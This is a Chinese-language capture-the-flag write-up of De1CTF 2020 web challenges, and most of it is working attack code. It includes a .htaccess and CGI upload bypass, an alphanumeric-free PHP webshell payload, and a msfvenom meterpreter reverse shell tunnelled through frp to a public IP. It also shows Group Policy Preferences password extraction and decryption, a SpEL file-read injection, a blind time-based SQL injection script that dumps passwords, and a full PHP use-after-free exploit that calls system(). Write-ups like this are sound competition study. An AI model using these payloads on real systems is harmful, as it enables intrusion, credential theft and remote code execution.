2020De1CTF_Web_Wp

2020De1CTF_Web_Wp

[TOC]

check in

非预期

文件名过滤了ph
文件内容过滤了perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet
考虑上传.htaccess
payload:

1
2
AddType application/x-httpd-p\
hp .xxx

利用\换行来绕过过滤
文件内容利用php短标签

1
<?= system("cat /flag");

预期解

利用cgi
payload(题目环境我没试成功,但是是可行的
.htaccess

1
2
Options +ExecCGI
AddHandler cgi-script .xxx

1.xxx

1
2
3
#!/bin/bash
touch 3.txt
cp /flag* ./3.txt

Hard_Pentest_1

无字母webshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
if (($_FILES["file"]["size"] < 2048) && Check()){
if ($_FILES["file"]["error"] > 0){
die($_FILES["file"]["error"]);
}
else{
$filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
echo "save in:" . $sandbox."/" . $filename;
}
}
else{
echo "Not Allow!";
}
}

function Check(){
$BlackExts = array("php");
$ext = explode(".", $_FILES["file"]["name"]);
$exts = trim(end($ext));
$file_content = file_get_contents($_FILES["file"]["tmp_name"]);

if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
!in_array($exts, $BlackExts) &&
!preg_match('/\.\./',$_FILES["file"]["name"])) {
return true;
}
return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="submit">
</form>

</body>
</html>

上传exp:

1
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>

POST:

1
__=system&_=echo ^<?php eval($_REQUEST[a]); > a.php

蚁剑拿到webshell,msf生成木马反弹shell

1
2
windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=5820 -f exe -o test.exe

frpc配置

1
2
3
4
5
6
7
8
9
[common]
server_addr = 公网ip
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5820
remote_port = 5820

把生成的.exe文件放到47.113.219.76上,运行

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 5820
exploit

GPP漏洞读取域用户

1
2
dir /s /a \\192.168.0.12\SYSVOL\*.xml
type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml

拿到cpassword,gpp-decrypt解密

1
2
3
4
5
uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08

dkk@kali:~$ gpp-decrypt uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
zL1PpP@sSwO3d

拿到flag和 下一题hint

1
2
3
4
5
6
7
8
9
flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.

calc

java的题…..不太会
题目不难,但是java自己没有认真学
payload:
http://106.52.164.141/spel/calc?calc=nEW java.io.BufferedReader(nEW java.io.FileReader("/flag")).readLine()
大小写绕过过滤

mixture

测试发现除了admin账号,其他账号都可以任意密码登陆进去
/member.php页面发现注释<!--orderby-->
尝试提交参数member.php?orderby=sleep发现有过滤回显,CTF嘛哪里有过滤哪里就有洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
import requests
import time
i=1
n=2
flag=""
header={"Cookie":"PHPSESSID=8985l543q88ke4ltd1trnum9e0"}
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
for i in range(1,50):
print(i)
m=128/2
j=128/2
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)
#exp = "and(case when ascii(mid((select user())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format (i,m)
#exp = "and(case when ascii(mid((select database())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format (i,m)
#exp="and(case when ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format (i,m)
#exp = "and(case when ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='member')from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format (i,m)
exp = "and(case when ascii(mid((select group_concat(password) from member)from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format (i,m)
url = 'http://134.175.185.244/member.php?orderby={}'.format(exp)
print(m)
startTime=time.time()
p=requests.get(url,timeout=100,headers=header)
if time.time()-startTime>4:
n=1
else:
n=0
if q==7:
if time.time()-startTime>4:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)

webpwn题,后面不太会了

Easy PHP UAF

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
//<?php

pwn("ls");

function hex($val)
{
return "0x".dechex($val)."<br>";
}

function pwn($cmd) {
global $abc, $helper, $backtrace, $backtrace2;

class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}

class Helper {
public $a, $b, $c, $d;
}

function allocate(&$a, $depth)
{
if ($depth === 0) return;
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
$a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
allocate($a, $depth - 1);
}

function str2ptr(&$str, $p = 0) {
$address = 0;
$address |= ord($str[$p+7]);
$address <<= 8;
$address |= ord($str[$p+6]);
$address <<= 8;
$address |= ord($str[$p+5]);
$address <<= 8;
$address |= ord($str[$p+4]);
$address <<= 8;
$address |= ord($str[$p+3]);
$address <<= 8;
$address |= ord($str[$p+2]);
$address <<= 8;
$address |= ord($str[$p+1]);
$address <<= 8;
$address |= ord($str[$p+0]);
return $address;
}

function write(&$str, $p, $v)
{
$str[$p+0] = chr($v & 0xff);
$v >>= 8;
$str[$p+1] = chr($v & 0xff);
$v >>= 8;
$str[$p+2] = chr($v & 0xff);
$v >>= 8;
$str[$p+3] = chr($v & 0xff);
$v >>= 8;
$str[$p+4] = chr($v & 0xff);
$v >>= 8;
$str[$p+5] = chr($v & 0xff);
$v >>= 8;
$str[$p+6] = chr($v & 0xff);
$v >>= 8;
$str[$p+7] = chr($v & 0xff);
}

function memRead($addr)
{
global $abc, $helper;
write($abc, 0xa8, $addr - 0x10);
return strlen($helper->a);
}

function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
$contiguous = [];
allocate($contiguous, 0);

trigger_uaf('x');
$abc = $backtrace[1]['args'][0];

$helper = new Helper;
$helper->a = $helper;
$helper->b = function($x) {};
$helper->c = 0x1337;

if (strlen($abc) == 79 /*|| strlen($abc) == 0*/)
{
die("UAF failed");
}

# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x10);
$helper->a = "helper"; // otherwise a strage crash
$abc_addr = $php_heap + 0x18;
$libphp_addr = str2ptr($abc, 0) - 0xd73ec0;
$zif_system = $libphp_addr + 0x355a86;
$helper->b = function($x){};
$closure_obj = str2ptr($abc, 0x20);
echo ("abc_addr = ".hex($abc_addr));
echo ("libphp_addr = ".hex($libphp_addr));
echo ("zif_system = ".hex($zif_system));
echo ("closure_obj = ".hex($closure_obj));
echo ("<br>");

// fake value
write($abc, 0x10, $closure_obj);
write($abc, 0x18, 0x6);

function copyFunc($off)
{
global $helper;
global $abc;
if ($off > 0x110) return;
write($abc, 0xd0 + 0x18 + $off, str2ptr($helper->a, $off));
write($abc, 0xd0 + 0x20 + $off, str2ptr($helper->a, $off+8));
write($abc, 0xd0 + 0x28 + $off, str2ptr($helper->a, $off+0x10));
write($abc, 0xd0 + 0x30 + $off, str2ptr($helper->a, $off+0x18));
write($abc, 0xd0 + 0x38 + $off, str2ptr($helper->a, $off+0x20));
write($abc, 0xd0 + 0x40 + $off, str2ptr($helper->a, $off+0x28));
write($abc, 0xd0 + 0x48 + $off, str2ptr($helper->a, $off+0x30));
write($abc, 0xd0 + 0x50 + $off, str2ptr($helper->a, $off+0x38));
write($abc, 0xd0 + 0x58 + $off, str2ptr($helper->a, $off+0x40));
write($abc, 0xd0 + 0x60 + $off, str2ptr($helper->a, $off+0x48));
write($abc, 0xd0 + 0x68 + $off, str2ptr($helper->a, $off+0x50));
write($abc, 0xd0 + 0x70 + $off, str2ptr($helper->a, $off+0x58));
write($abc, 0xd0 + 0x78 + $off, str2ptr($helper->a, $off+0x60));
write($abc, 0xd0 + 0x80 + $off, str2ptr($helper->a, $off+0x68));
write($abc, 0xd0 + 0x88 + $off, str2ptr($helper->a, $off+0x70));
write($abc, 0xd0 + 0x90 + $off, str2ptr($helper->a, $off+0x78));
write($abc, 0xd0 + 0x98 + $off, str2ptr($helper->a, $off+0x80));
write($abc, 0xd0 + 0xa0 + $off, str2ptr($helper->a, $off+0x88));
copyFunc($off + 0x90);
}

write($abc, 0xd0, 0x0000031800000002);
write($abc, 0xd0 + 8, 0x0000000000000003);
copyFunc(0);

write($abc, 0xd0 + 0x38, 0x0210000000000001);
write($abc, 0xd0 + 0x68, $zif_system);
write($abc, 0x20, $abc_addr + 0xd0);

($helper->b)($cmd);
die("end");

}